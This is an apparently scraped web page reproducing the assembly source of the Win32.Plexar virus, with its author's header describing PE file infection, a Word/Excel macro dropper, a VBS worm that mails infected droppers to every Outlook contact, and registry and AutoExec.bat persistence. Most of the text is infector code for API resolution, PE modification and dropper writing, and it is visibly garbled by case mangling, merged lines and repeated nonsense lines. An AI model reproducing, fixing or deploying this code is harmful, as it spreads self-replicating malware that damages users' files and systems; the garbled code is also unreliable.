2. Tech
  3. Win32

Win32

xiaoxiao2021-03-05  24

屯 屯 屯 屯 屯 屯 屯 屯 屯

;? Win32.plexar>?

; Designed by Litesys in Venezuela, South America

;

PE / DOC / XLS / Outlook Multithreaded Polymorphic Direct action infector.

;

Welcome to Plexar, My LATEST CODE.

;

IT INFECTS PE FILES BY Incrementing The Last Section, I don't overwrite

; .reloc Section, IT's Preferible To Let IT Alone. in Fact, this Virus

Avoids Infecting Some av or win32 files That Should Never Be infected.

THIS DONE BY CRC32 Comparation.

;

; Infects Word and Excel Documents by Dropping (thru vbscript) a macro

Module-Infectant Virus in The Normal Template and Personal.xls That IS

Capable of Dropping an infected pe file to the windows Directory and the Windows Directory and TEN

Running IT.

;

Distributes Through Electronic Mail by Dropping A VBS WORM CAPABLE OF

; Sending Infected Droppers to EVERY Email Address in the Outlook Address

Book. Sorry But I Didn't Have Any Time To Code A Decent MAPI WORM = (.

;

The poly engine is another lame table-driven engine Written by me =), NO

Anti-aver intentions bee the reason to write what Poly Engine, Just To

CONCEAL THIN CODE. SO I Think It Doesn't Desire An Explanation

Because the garbage is very lame.

;

IT Runs The Different Routines (Word Infection, VBS Worm, Direct Action)

In Different Threads. As I Always Said, I don't optimize my code Too much.

;

; The payload is very funny and if you're from venezuela i hope you

Appreciate it. Consists in Dropping a Simple Com File That Displays

Some Silly Stuff in Spanish, It Runs on AutoExec.Bat But n't Display

The message untric the folloading rule is completed (this is a very

Kewl Idea I Learnt from Byway; D):

;

; If Month <= 7: day = month ^ 2/3 4; if Month> = 8: day = month ^ 2/5 - 4

;

; So The Payload Will Run On EVERY MONTH (AS A COINCIDENCE, THE FORMULA

Pointed to december 24th: p). It's not destructive so don't black.

;

This Virus Has Lots of Bugs, I'VE CORRECTED MANY But Still There Are A

Lot. IT WAS TESTED Under Win95 (4.10.111), Win98 (4.10.1998), WINME AND

Winnt (4.0 / sp4), The Virus Worked Perfectly Under Those Versions. I don't

; Know About Win98 SE And Win2k, Since I don't have them installed, i Have

The CDS Here But I'm A Lazy Ass and My HD Space Is Totally Phuken.

;

Virus size = 12kb. Code not commented. Nor Even Avp or Norton (with

Their "high heuristic" bloodhound shit) Flagged the infected pets,

Except from Norton, Which flagged the VBS WORM.

;

; If you need to contact me You can use Both mail addresss: litesys@monte.as

OR LITENO2@softHome.net. Rembember, for decent stuff.

;

Patria O Muerte: VENCEREMOS.

LiteSys.

Venezuela, Julio / AGOSTO - (C) 2001

屯 屯 屯 屯 屯 屯 屯 屯 屯

.586

.Model flat, stdcall

INCLUDE C: /TOOLS/TASM/include/win32api.inc

INCLUDE C: /TOOLS/TASM/include/windows.inc

EXTRN EXITPROCESS: PROC

EXTRN MessageBoxExa: Proc

.DATA

Debug Equias

EQU

By EQU

Wo Equ

DWO EQU

RDTSC EQU

Apicall Macro APIZ

Call DWORD PTR [APIZ EBP]

ENDM

Numero_paginas EQU 32H

K32_W9X EQU 0BFF70000H

GPA_W9X EQU 0BFF76DACH

Virus_Tama EQU (Termina_Plexar - Empieza_Plexar)

Titulo DB "plexar."

DB Virus_Tama / 10000 MOD 10 30H

DB Virus_Tama / 01000 MOD 10 30HDB Virus_TAMA  / 00100 MOD 10 30H

DB Virus_TAMA  / 00010 MOD 10 30H

DB Virus_TAMA  / 00001 Mod 10 30H

DB 00H

MENSAJE DB "Plexar (C) 2001 LiteSys"

DB "- Activado."

DB 00H

REG_SZ EQU <1>

HKEY_LOCAL_MACHINE EQU <80000002H>

.Code

Empieza_PLEXAR:

Call @delta

@Delta:

POP EAX

XCHG EBP, EAX

Sub ebp, offset @delta

JMP @@ 1

DB 00H, 00H, "[Plexar]", 00h, 00h

@@1:

Call @ SEH_1

MOV ESP, DWORD PTR [ESP 8h]

JMP @fuerahost

@ SEH_1:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

MOV EDI, DWORD PTR [ESP 8h]

Call busca_k32

Call busca_gpa

Lea ESI, OFS [CREATEFILEA]

Lea edi, OFS [APIS_K32]

MOV EBX, DWO [kernel32]

Call busca_apis

Lea Edx, OFS [RewTDir]

Push Edx

PUSH MAX_PATH

Apicall getCurrentDirectorya

OR EAX, EAX

JZ @Fuerahost

IF Debug

Push EBP

Call Directa

Push EBP

Call WORM_VBS

Push EBP

Call infecta_word

JMP @fuerahost

Else

Call Thread

ENDIF

Call Er_Pailon

@Fuerahost:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

Push 12345678H

Org $ -4

Hostback DD Offset Mentira

RET

Where is Xiyomira? Where is Xomotice? Where is Xomo?

El Thread Principal, Carga Los OTROS Threads.

Thread Proc

Pushhad

And by [Listo_Directa], 00H

XOR EAX, EAX

Lea EBX, OFS [threeRead_directa]

Push EBX

Push EAX

Push EBP

LEA EBX, OFS [Directa]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_directa], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

@Revdirect:

Push -1

Push dwo [threeRead_directa]

Apicall WaitforsingleObject

CMP by [Listo_Directa], 01H

JNZ @revdirect

XOR EAX, EAX

Lea EBX, OFS [THREAD_WORMVBS] PUSH EBX

Push EAX

Push EBP

Lea EBX, OFS [WORM_VBS]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_wormvbs], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

XOR EAX, EAX

Lea EBX, OFS [thread_iword]

Push EBX

Push EAX

Push EBP

Lea ebx, OFS [infecta_word]

Push EBX

Push EAX

Push EAX

Apicall CreateThread

Mov dwo [thread_iword], EAX

OR EAX, EAX

JZ @finthread

Push 02h

Push EAX

Apicall SetthreadPriority

Push -1

Push True

Lea Eax, OFS [Thread_Wormvbs]

Push EAX

Push 02h

Apicall WaitFormultiPleObjects

@Finthread:

Popad

RET

Thread Endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

PayLoad.

Er_Pailon Proc

Pushhad

CDQ

Push Edx

Push file_attribute_normal

Push Create_New

Push Edx

Push Edx

Push generic_write

Lea Eax, OFS [Cocofrio]

Push EAX

Apicall Createfilea

Mov DWO [Pfhandle], EAX

INC EAX

JZ @P_fin

Dec EAX

XCHG EBX, EAX

XOR EDX, EDX

Push Edx

Lea Eax, OFS [PTEMPORAL]

Push EAX

Push largo_pprog

Lea Eax, OFS [payload_prog]

Push EAX

Push EBX

Apicall Writefile

OR EAX, EAX

JZ @P_fin

Push dwo [pfhandle]

Apicall CloseHandle

CDQ

Push Edx

Push file_attribute_normal

Push Open_EXISTING

Push Edx

Push Edx

Push generic_write

Lea Eax, OFS [AutoExec]

Push EAX

Apicall Createfilea

Mov DWO [Pfhandle], EAX

INC EAX

JZ @P_fin

Dec EAX

CDQ

Push 00000002H

Push Edx

Push Edx

Push EAX

Apicall setFilePointer

CDQ

Push Edx

Lea Eax, OFS [PTEMPORAL]

Push EAX

Push largo_cocofrio-1

Lea Eax, OFS [Cocofrio]

Push EAX

Push dwo [pfhandle]

Apicall Writefile

OR EAX, EAX

JZ @P_fin

Push dwo [pfhandle]

Apicall CloseHandle

@P_fin:

Popad

RET

Er_Pailon ENDP

Where is Xiyomo knows? Where is Xomomo? Where is Xiyomy? Where is Xiyomo?

Busca_k32 proc

And EDI, 0FFFFFFFF0000h

Push numero_paginas

POP ECX

@ Compara_k32:

Push EDI

MOV BX, Word PTR [EDI]

OR BX, 03D5BH; 5A4D || 3D5B == 7F5F

SUB BX, 07F5FH

JNZ @ incrementa_k32

Add Edi, [EDI 3CH]

MOV BX, Word PTR [EDI]; 4550 && C443 == 4440

And bx, 0c443h

XOR BX, 04440H

JE @Enk32

@ Increea_k32:

POP EDI

Sub EDI, 10000H

Loop @ Compara_k32

Push K32_W9x

@Enk32:

POP DWO [kernel32]

RET

Busca_k32 endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

DB 5 DUP (90h)

Proceso Para Buscar a getProcaddress

Busca_gpa proc

MOV EBX, DWO [kernel32]

MOV EDI, EBX

Add Edi, DWORD PTR [EDI 3CH]

Mov EDI, DWORD PTR [EDI 78H]

Add Edi, EBX

Mov dwo [exports], EDI

MOV ECX, DWORD PTR [EDI 18H]

Dec ECX

MOV EDI, DWORD PTR [EDI 20H]

Add Edi, EBX

XOR EAX, EAX

@ BGPA_1:

MOV ESI, DWORD PTR [EDI]

Add ESI, EBX

Push EDI

Push L_GetProcaddress

POP EDI

Pushhad

Call CRC32

CMP EAX, CRC32_GETPROCADDRESS

Popad

POP EDI

JE @ BGPA_2

INC EAX

Add Edi, 4H

Loop @ BGPA_1

PUSH GPA_W9X

JMP @ BGPA_3

@ BGPA_2:

Mov ESI, DWO [EXPORTS]

Add Eax, EAX

Mov EDI, DWORD PTR [ESI 24h]

Add Edi, EBX

Add Edi, EAX

Movzx Eax, Word PTR [EDI]

Imul Eax, 4h

MOV EDI, DWORD PTR [ESI 1CH]

Add Edi, EBX

Add Edi, EAX

MOV EAX, DWORD PTR [EDI]

Add Eax, EBX

Push EAX

@ BGPA_3:

POP dwo [getProcaddress]

RET

Busca_gpa endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

ESI -> Donde Guardar Las Apis

EDI -> Cadenas de Apis

EBX -> MODULO

Proceso Para Buscar Las Apis

Busca_apis proc

Pushhad

Mov Dwo [Guardalo], ESI

XCHG EDI, ESI

@ Ba1:

Lea edi, OFS [TEMPAPI] @ ba2:

CMP Byte PTR [ESI], 00H

JE @ ba4

Lodsb

CMP Al, 0EH

Ja @ ba3

XOR ECX, ECX

XCHG CL, Al

PUSH ESI

Lea ESI, OFS [PACKEDAPIS]

@ Ba5:

Inc ESI

CMP Byte PTR [ESI], 00H

JNZ @ ba5

Loop @ ba5

Inc ESI

@ Ba6:

Movsb

CMP Byte PTR [ESI], 00H

JNZ @ ba6

POP ESI

JMP @ ba2

@ Ba3:

Stosb

JMP @ ba2

@ Ba4:

XOR Al, Al

Stosb

Lea Eax, OFS [TempaPi]

Push EAX

Push EBX

Call [getProcadDress EBP]

NOP

PUSH ESI

Mov ESI, 12345678H

Org $ -4

Guardalo DD 00000000H

Mov DWORD PTR [ESI], EAX

Add dwo [Guardalo], 00000004H

POP ESI

Inc ESI

CMP Byte Ptr [ESI], 0FFH

JNZ @ ba1

@ OA7:

Popad

RET

Busca_apis endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Accon Directa.

Directa Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ seh_2

MOV ESP, DWORD PTR [ESP 8h]

JMP @dirf

@ SEH_2:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Lea Edx, OFS [RewTDir]

Push Edx

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @dirf

@ Dir1:

Lea Eax, OFS [BusQueda]

Push EAX

Lea Eax, OFS [Mascara]

Push EAX

Apicall FindfirstFilea

Mov dwo [bhandle], EAX

INC EAX

JZ @ Dir2

@ Dir3:

Lea edi, OFS [busqueda.wfd_szfilename]

MOV EBX, EDI

Push EBX

XOR Al, Al

Scasb

JNZ $ -1

XCHG ESI, EDI

SUB ESI, 5H

OR DWORD PTR [ESI], 20202020H

Mov EDI, 5H

Call CRC32

POP EBX

CMP Eax, CRC_EXE; .exe CRC32

JE @infecta_este_exe

CMP EAX, CRC_SCR ;.SCR CRC32

JE @infecta_este_exe

@Retorna_directa:

Lea Eax, OFS [BusQueda]

Push EAX

Push dwo [bhandle]

Apicall FindnextFilea

OR EAX, EAX

JNZ @ DIR3

Push dwo [bhandle]

Apicall FindClose

@ Dir2:

Lea Eax, OFS [Puto_Puto]

Push EAX

Apicall setCurrentDirectorya

Lea Eax, OFS [busqueda.wfd_szfilename]

Push EAX

PUSH MAX_PATH

Apicall getCurrentDirectorya

CMP EAX, DWO [LARGPP]

JZ @dirf

Mov dwo [larpp], EAX

JMP @ Dir1

Lea Eax, OFS [Rewtdir]

Push EAX

Apicall setCurrentDirectorya

@Dirf:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Inc by [Listo_directa]

Mov dwo [Guardaebp], EBP

Popad

Mov EBX, 12345678H

Org $ -4

Guardaebp DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Infecta_este_exe:

Call infecta_pe

JMP @retorna_directa

Directa ENDP

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Proceso Para Infector Un PE.

;

EBX -> Archivo a infectar

Infecta_pe proc

Pushhad

Push dwo [Hostback]

POP dwo [Guarda_eip]

Call @seh_ipe

MOV ESP, [ESP 8h]

JMP @pef

@Seh_ipe:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push 019D

POP ECX

MOV ESI, EBX

Lea edx, OFS [crcnoinf]

@CICLONO:

Push 04h

POP EDI

Push EBX

PUSH ESI

Push Edx

Push ECX

Call CRC32

POP ECX

POP EDX

POP ESI

POP EBX

CMP EAX, DWORD PTR [EDX]

JZ @pef

Add Edx, 4H

Loop @ciclono

Push 00000000H

Push EBX

Apicall setFileAttributesa

XOR EAX, EAX

Push EAX

Push 00000000H

Push Open_EXISTING

Push EAX

Push EAX

Push generic_read generic_write

Push EBX

Apicall Createfilea

Mov dwo [fhandle], EAX

INC EAX

JZ @pef

Dec EAX

Push null

Push EAX

Apicall getFileSize

Mov DWO [Tama_1], EAX

INC EAX

JZ @pe_close

Dec EAX

CMP EAX, 8192D

JB @pe_close

Add Eax, Virus_TAMA  1400H

Mov dwo [tama_2], EAX

XOR EDX, EDX

Push Edx

Push EAX

Push Edx

Push Page_Readwrite

Push Edx

Push dwo [fhaandle]

Apicall CreateFilemappingA

Mov dwo [Mhaldle], EAX

OR EAX, EAX

JZ @pe_close

XOR EDX, EDX

Push dwo [tama_2]

Push Edx

Push Edx

Push file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap], EAX

OR EAX, EAX

JZ @pe_closemap

Mov Edi, EAX

MOV BX, Word PTR [EDI]

And bx, 3ed4h; "zm" = 5A4DH ^ 3ed4h == 1444H

Add BX, BX

XOR BX, 3488H

JNZ @pe_unmap

MOV EBX, DWORD PTR [EDI 3CH]

Add ebx, EDI

CMP EBX, DWO [BASEMAP]

JB @pe_unmap

Mov Edx, Dwo [BaseMap]

Add Edx, Dwo [Tama_1]

CMP EBX, EDX

Ja @pe_unmap

Add Edi, [EDI 3CH]

MOV BX, Word PTR [EDI]

OR BX, 0AEDAH; "EP" = 4550h | 0AEDAH == 0efdah

SUB BX, 0EFDAH

JNZ @pe_unmap

MOV ESI, EDI

Pushhad

Add ESI, 4CH

Mov EDI, 5H

Call CRC32

CMP EAX, CRC_PLXR

Popad

JE @pe_unmap

Mov Eax, "RXLP" xor 0c3e8f2a8h

XOR Eax, 0c3e8f2a8h

MOV DWORD PTR [EDI 4CH], EAX

Add ESI, 18H

Movzx Eax, Word PTR [EDI 14H]

Add ESI, ESI

XOR EDX, EDX

Movzx EDX, Word PTR [EDI 06H]

Dec edx

Imul EDX, 28H

Add ESI, EDX

OR DWORD PTR [ESI 24h], 0A0000020H

MOV EAX, DWORD PTR [ESI 08H]

Push EAX

Add Eax, Virus_TAMA  400H

Mov DWORD PTR [ESI 08H], EAX

MOV EBX, DWORD PTR [EDI 3CH]

XOR EDX, EDX

Div EBX

INC EAX

Mul EBX

Mov DWORD PTR [ESI 10H], EAX

MOV EAX, DWORD PTR [ESI 10h]

Add Eax, DWORD PTR [ESI 0CH]

MOV DWORD PTR [EDI 50H], ​​EAX

POP EDX

Mov Eax, DWORD PTR [EDI 28H]

Add Eax, DWORD PTR [EDI 34H]

Mov dwo [Hostback], EAX

Add Edx, DWORD PTR [ESI 0CH]

MOV DWORD PTR [EDI 28H], EDX

Push EBP

Push EBX

Inc ESP

POP EBX; /

DEC ESP; /

Push EBX;> "[Lsx]" Cadena EJECUTABLE.

POP EAX; /

POP EBP; /

MOV EDI, DWORD PTR [ESI 14H]

Add Edi, DWORD PTR [ESI 08H]

Add Edi, DWO [BaseMap]

Mov ECX, Virus_Tama / 4Sub EDI, Virus_TAMA 400H

Lea ESI, OFS [EMPIEZA_PLEXAR]

Call PXPE

Push dwo [tama_2]

POP DWO [Tama_1]

@PE_UNMAP:

XOR EAX, EAX

Push EAX

Push EAX

Push dwo [tama_1]

Push dwo [fhaandle]

Apicall setFilePointer

Push dwo [fhaandle]

Apicall setndoffile

Push dwo [BaseMap]

Apicall unmapViewoffile

@PE_Closemap:

Push dwo [mhandle]

Apicall CloseHandle

@PE_Close:

Push dwo [fhaandle]

Apicall CloseHandle

@Pef:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

Push dwo [Guarda_eip]

POP DWO [HostBack]

Popad

RET

Infecta_pe endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Este Proceso Suelta En Disco Un Archivo PE Vacio.

;

EBX -> Nombre

Droppear_pe proc

Pushhad

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_Always

Push EAX

Push EAX

Push generic_read generic_write

Push EBX

Apicall Createfilea

Mov dwo [fhandle_dpe], EAX

INC EAX

JZ @fin_dpe

Dec EAX

XOR EBX, EBX

Push EBX

Push 32768d

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

MOV DWO [MHANDLE_DPE], EAX

OR EAX, EAX

JZ @DPE_CIERRA

XOR EBX, EBX

Push 32768d

Push EBX

Push EBX

Push file_map_write

Push EAX

Apicall MapViewOffile

MOV DWO [BaseMap_DPE], EAX

OR EAX, EAX

JZ @dpe_cierramap

Push EAX

Lea Eax, OFS [Dropper]

Push EAX

Call _ap_depack_asm

Add ESP, 08H

XOR EBX, EBX

Push EBX

Push EBX

Push EAX

Push dwo [fhandle_dpe]

Apicall setFilePointer

@DPE_Desmapea:

Push dwo [BaseMap_DPE]

Apicall unmapViewoffile

@DPE_CIERRAMAP:

Push dwo [mhandle_dpe]

Apicall CloseHandle

@DPE_CIERRA:

Push dwo [fhandle_dpe]

Apicall setndoffile

Push dwo [fhandle_dpe]

Apicall CloseHandle

Popad

RET

@Fin_dpe:

Popad

STC

RET

Droppear_pe endp

DB 00h, 00h

DB ""

DB 00h, 00h

DB "[hecho en venezuela]"

DB 00h, 00h

Where is Xiyomira? Where is Xomotice? Where is Xomo?

Proceso Para Soltar El Virus Macro de Word.

Infecta_word Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ SEH_3

MOV ESP, DWORD PTR [ESP 8h]

JMP @iw_fin

@ SEH_3:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

PUSH MAX_PATH

Push null

Apicall VirtualaLloc

MOV DWO [VFREEZ], EAX

OR EAX, EAX

JZ @iw_fin

PUSH MAX_PATH

Push EAX

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @iw_fin

Push dwo [vfreez]

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @iw_fin

Push Mem_Decommit

PUSH MAX_PATH

Push 12345678H

Org $ -4

VFreez DD 00000000H

Apicall VirtualFree

Lea EBX, OFS [WScript_exe]

Call @existe_archivo

JNC @vbs_fin

Lea EBX, OFS [Raxelp _ $$$]

Call @existe_archivo

JC @iw_fin

Lea Edi, OFS [Macaco]

Push 08h

POP ECX

@ IW2:

Push 25D

POP EBX

Call Random

Add Eax, 65D

Stosb

Loop @ IW2

MOV EAX, "$$$."

Stosd

XOR Al, Al

Stosb

Lea EBX, OFS [Macaco]

Call Droppear_pe

JC @iw_fin

Lea EBX, OFS [Macaco]

Call infecta_pe

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Open_EXISTING

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Macaco]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_iw], EAX

INC EAX

JZ @iw_fin

Dec EAX

Push null

Push EAX

Apicall getFileSize

MOV DWO [Tama_iw], EAX

INC EAX

JZ @iw_cierrafile

XOR EAX, EAX

Push EAX

Push EAX

Push EAX

Push Page_Readwrite

Push EAX

Push dwo [fhandle_iw] APICALL CREATEFILEMAPPINGA

Mov dwo [Mhaldle], EAX

OR EAX, EAX

JZ @iw_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_iw], EAX

OR EAX, EAX

JZ @iw_cierramap

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

Mov Eax, Dwo [Tama_iw]

Add Eax, EAX

Add Eax, 1000H

Push EAX

Push null

Apicall VirtualaLloc

Mov DWO [Memoria_iw], EAX

OR EAX, EAX

JZ @iw_fin

MOV ECX, DWO [Tama_iw]

Mov Edi, EAX

Mov ESI, DWO [Basemap_iw]

@Conve:

Lodsb

Call @Hexa

Stosw

Loop @conve

XOR EAX, EAX

Stosd

Push dwo [basemap_iw]

Apicall unmapViewoffile

Push dwo [mhandle_iw]

Apicall CloseHandle

Push dwo [fhandle_iw]

Apicall CloseHandle

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_New

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Raxelp _ $$$]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_iw], EAX

INC EAX

JZ @iw_fin

Dec EAX

XOR EBX, EBX

Push EBX

Push 131072D

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

Mov dwo [Mhandle_iw], EAX

OR EAX, EAX

JZ @iw_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_iw], EAX

OR EAX, EAX

JZ @iw_cierramap

Mov Edi, EAX

Lea ESI, OFS [Virus_Macro]

Push l_virus_macro

POP ECX

REP MOVSB

Mov ESI, DWO [MEMORIA_IW]

XOR EDX, EDX

XOR EAX, EAX

@Iw_b:

Movsb

Inc EDX

CMP EDX, 200D

JNZ @iw_d

MOV Al, '""

Stosb

MOV AX, 0A0DH

Stosw

Mov Eax, "ADOJ"

Stosd

MOV EAX, 'J ='

Stosd

MOV EAX, "ADO"

Stosd

MOV AX, " "

Stosw

MOV Al, '""

Stosb

; JODA = JODA "

XOR EAX, EAX

XOR EDX, EDX

@Iw_d:

CMP Byte PTR [ESI], Al

JNZ @iw_b

MOV Al, '""

Stosb

MOV AX, 0A0DH

Stosw

Lea ESI, OFS [Virus_Macro_2]

Push l_virus_macro_2

POP ECX

REP MOVSB

Push dwo [basemap_iw]

Apicall unmapViewoffile

Push dwo [mhandle_iw]

Apicall CloseHandle

Sub EDI, DWO [BaseMap_iw]

XOR EBX, EBX

Push EBX

Push EBX

Push EDI

Push dwo [fhandle_iw]

Apicall setFilePointer

Push dwo [fhandle_iw]

Apicall setndoffile

Push dwo [fhandle_iw]

Apicall CloseHandle

Push Mem_Decommit

Mov Eax, Dwo [Tama_iw]

Add Eax, EAX

Add Eax, 1000H

Push EAX

Push dwo [Memoria_iw]

Apicall VirtualFree

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_Always

Push EAX

Push EAX

Push generic_write

Lea EBX, OFS [PLXWRD_VBS]

Push EBX

Apicall Createfilea

Mov dwo [fhandle], EAX

INC EAX

JZ @iw_fin

Dec EAX

XOR EBX, EBX

Push EBX

Lea edx, OFS [scriptum]

Push Edx

Push largo_mvbs

Lea edx, OFS [macro_vbs]

Push Edx

Push EAX

Apicall Writefile

Push dwo [fhandle_iw]

Apicall CloseHandle

Call @iw_q

DB "shlwapi.dll", 00h

@Iw_q: Apicall LoadLibrarya

OR EAX, EAX

JZ @iw_fin

Call @iw_k

DB "SHSETVALUEA", 00h

@Iw_k: push eax

Apicall getProcAddress

OR EAX, EAX

JZ @iw_fin

Push 11D

Lea EBX, OFS [PLXWRD_VBS]

Push EBX

Push reg_sz

Call @iw_l

DB "plexar", 00h

@Iw_l: Call @iw_m

DB "Software / Microsoft / Windows / CurrentVersion / Run", 00H

@IW_M: Push HKEY_LOCAL_MACHINE

Call EAX

@Iw_fin:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Mov dwo [Guardaebp2], EBP

Popad

MOV EBX, 12345678HORG $ -4

Guardaebp2 DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Iw_cierramap:

Push dwo [mhandle_iw]

Apicall CloseHandle

@Iw_cierrafile:

Push dwo [fhandle_iw]

Apicall CloseHandle

JMP @iw_fin

Convierte Un Numero a Su RepesenTacion ASCII EN HEX.

@Hexa:

Push ECX

Push EDI

XOR ECX, ECX

MOV CL, Al

Push ECX

SHR CL, 04H

Lea Edi, OFS [Tabla_hex]

INC CL

@@ y:

Inc EDI

Deccl

JNZ @@ y

Dec Edi

Mov Al, Byte PTR [EDI]; Pasa El Numero Exacto de la Tabla

POP ECX

And Cl, 0FH

Lea Edi, OFS [Tabla_hex]

INC CL

@@ x:

Inc EDI

Deccl

JNZ @@ x

Dec Edi

Mov Ah, Byte PTR [EDI]; Pasa El Numero Exacto de la Tabla

POP EDI

POP ECX

RET 00H

Infecta_word endp

Where is Xiyomira? Where is Xomotice? Where is Xomo?

WORM_VBS Proc Pascal DeltaOfs: DWORD

Pushhad

Mov EBP, Deltaofs

Call @ SEH_4

MOV ESP, DWORD PTR [ESP 8h]

JMP @vbs_fin

@ SEH_4:

XOR EAX, EAX

Push DWORD PTR FS: [EAX]

MOV FS: [EAX], ESP

Push Page_Readwrite

PUSH MEM_COMMIT MEM_RESERVE MEM_TOP_DOWN

PUSH MAX_PATH

Push null

Apicall VirtualaLloc

MOV DWO [VFREEX], EAX

OR EAX, EAX

JZ @vbs_fin

PUSH MAX_PATH

Push EAX

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @vbs_fin

Push dwo [vfreex]

Apicall setCurrentDirectorya

OR EAX, EAX

JZ @vbs_fin

Push Mem_Decommit

PUSH MAX_PATH

Push 12345678H

Org $ -4

VFreex DD 00000000H

Apicall VirtualFree

Lea EBX, OFS [WScript_exe]

Call @existe_archivo

JNC @vbs_fin

Lea EBX, OFS [Raxelp_VBS]

Call @existe_archivo

JC @vbs_fin

Push 10D

POP EBX

Call Random

XCHG ECX, EAX

Lea Edi, OFS [Nombres_Varios]

Inc ECX

@ VBS1:

XOR Al, Al

Scasb

JNZ @ VBS1

Loop @ VBS1

Push EDI

@ VBS2: XOR Al, Al

Inc ECX

Scasb

JNZ @ VBS2

Dec ECX

POP EDI

Mov by [largovbs], cl

Mov dwo [Guardanom], EDI

MOV EBX, EDI

Call Droppear_pe

JC @vbs_fin

MOV EBX, DWO [Guardanom]

Call infecta_pe

XOR EAX, EAX

Push EAX

Push file_attribute_normal

Push Create_New

Push EAX

Push EAX

Push generic_read generic_write

Lea Eax, OFS [Raxelp_VBS]

Push EAX

Apicall Createfilea

Mov dwo [fhandle_wvbs], EAX

INC EAX

JZ @vbs_fin

Dec EAX

XOR EBX, EBX

Push EBX

Push 4096D

Push EBX

Push Page_Readwrite

Push EBX

Push EAX

Apicall CreateFilemappingA

Mov DWO [MHANDLE_WVBS], EAX

OR EAX, EAX

JZ @vbs_cierrafile

XOR EBX, EBX

Push EBX

Push EBX

Push EBX

Push file_map_read file_map_write

Push EAX

Apicall MapViewOffile

Mov dwo [basemap_wvbs], EAX

OR EAX, EAX

JZ @vbs_desmapea

Xchg EDI, EAX

Lea ESI, OFS [Gusano_VBS]

Push l_gusano_vbs

POP ECX

REP MOVSB

Push EDI

PUSH MAX_PATH

Push EDI

Apicall getWindowsDirectorya

OR EAX, EAX

JZ @vbs_cierratodo

POP EDI

Add Edi, EAX

MOV BYTE PTR [EDI], "/"

Inc EDI

Mov ESI, DWO [Guardanom]

Movzx ecx, by [largovbs]

REP MOVSB

Lea ESI, OFS [Gusano_VBS2]

Push l_gusano_vbs2

POP ECX

REP MOVSB

Sub EDI, DWO [BaseMap_WVBS]

Push dwo [BaseMap_WVBS]

Apicall unmapViewoffile

Push dwo [Mhandle_WVBS]

Apicall CloseHandle

XOR EBX, EBX

Push EBX

Push EBX

Push EDI

Push dwo [fhandle_wvbs]

Apicall setFilePointer

Push dwo [fhandle_wvbs]

Apicall setndoffile

Push dwo [fhandle_wvbs]

Apicall CloseHandle

Call @ VBS3

DB "shell32.dll", 00h

@ VBS3: Apicall LoadLibrarya

OR EAX, EAX

JZ @vbs_fin

Call @ VBS4

DB "shellexecutea", 00h, 5 dup (90h)

@ VBS4: Push EAX

Apicall getProcAddress

OR EAX, EAX

JZ @vbs_finxor EBX, EBX

Push EBX

Push EBX

Push EBX

Lea edx, OFS [Raxelp_VBS]

Push Edx

Push EBX

Push EBX

Call EAX

@VBS_FIN:

XOR ECX, ECX

POP DWORD PTR FS: [ECX]

POP ECX

IF Debug

Popad

RET

Else

Mov dwo [Guardaebp3], EBP

Popad

Mov EBX, 12345678H

Org $ -4

Guardaebp3 DD 00000000H

Push null

Call [EBX EXITTHREAD]

RET

ENDIF

@Vbs_cierratodo:

Push dwo [BaseMap_WVBS]

Apicall unmapViewoffile

@Vbs_desmapea:

Push dwo [Mhandle_WVBS]

Apicall CloseHandle

@Vbs_cierrafile:

XOR EBX, EBX

Push EBX

Push EBX

Push dwo [scriptum]

Push dwo [fhandle_wvbs]

Apicall setFilePointer

Push dwo [fhandle_wvbs]

Apicall setndoffile

Push dwo [fhandle_wvbs]

Apicall CloseHandle

JMP @vbs_fin

